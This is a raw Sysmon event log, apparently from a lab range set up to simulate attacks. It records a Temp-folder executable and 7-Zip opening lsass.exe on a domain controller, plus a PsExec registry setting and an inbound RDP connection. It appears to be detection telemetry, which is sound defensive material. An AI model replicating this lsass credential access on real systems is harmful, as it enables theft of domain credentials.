11:05:16.227{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.227{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000295148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:05:16.211{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.142{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-14EB-6216-B506-000000003802}5556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.142{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-14EB-6216-B506-000000003802}5556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.126{C8EA50B7-14EB-6216-B506-000000003802}55565884C:\Windows\system32\conhost.exe{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E7B23A193A477208A0AAD48B0FFA23,SHA256=E4EC8CDFCE8DCB992BA9CA2EBF9D1668F48217A7003723799E507E9839F8F0BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:16.054{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-14EB-6216-B506-000000003802}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.992{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14EB-6216-B506-000000003802}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:16.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1561EBDE16C257E5FE38610671EC446,SHA256=23B2A3EA828BBD49BD18F3A9291CB9AA5DEACCEAB65BBD0472C250FC0F727165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:17.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D44C918863CDEC73399BFA53A2A06DFE,SHA256=566AE8125A62885F1861636516C9F9BE2881CFF5C3893E171C3E4591E19A033A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:15.704{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49205-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:17.080{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DB828F6D5787DF27021664B24B29E7,SHA256=2FBC020814BD6F382DAB974FFE9EC3C28A8176A45AEE1E4F20BF694E3EDF6A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:18.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C4A23166C965C926D98A644CD07E93,SHA256=E997F7DDD2D175EA9549F9A4D2B1A57DCECE29FA1EFB395B0E39C3C42618A4DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.743{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.743{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.743{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.728{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.728{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.728{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.728{C8EA50B7-F2AD-6215-C000-000000003802}48566436C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.712{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.712{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.712{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.712{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.712{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000295156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 11:05:18.511{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exeC:\Users\Administrator\Downloads\Logfile.7z.tmp2022-02-23 11:05:18.511 10341000x8000000000000000295155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.495{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.495{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14E8-6216-B306-000000003802}6540C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:18.095{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0829C724C50F1754BC5D82B8D380D284,SHA256=116DDFE5CCD8DAEEDC01CD3B8681476B0C95B38894074FE94114DE7829A29FFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:17.004{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62471-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:19.665{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-148MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:19.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9890A81DECE95C022B73B63466E01A1F,SHA256=EA6CEA7163BDFD951D96C5119ACF70FAC968ED9B3EA11F24CA4BE293A6F6A7AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:19.490{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5850DFF61365B754887066874A53FEB,SHA256=63A3E232FB24C4551FD9FB2363E0AA9692F06145737AFBF9B6DD97B7FB911D7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.993{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14EF-6216-B706-000000003802}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.985{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:19.984{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 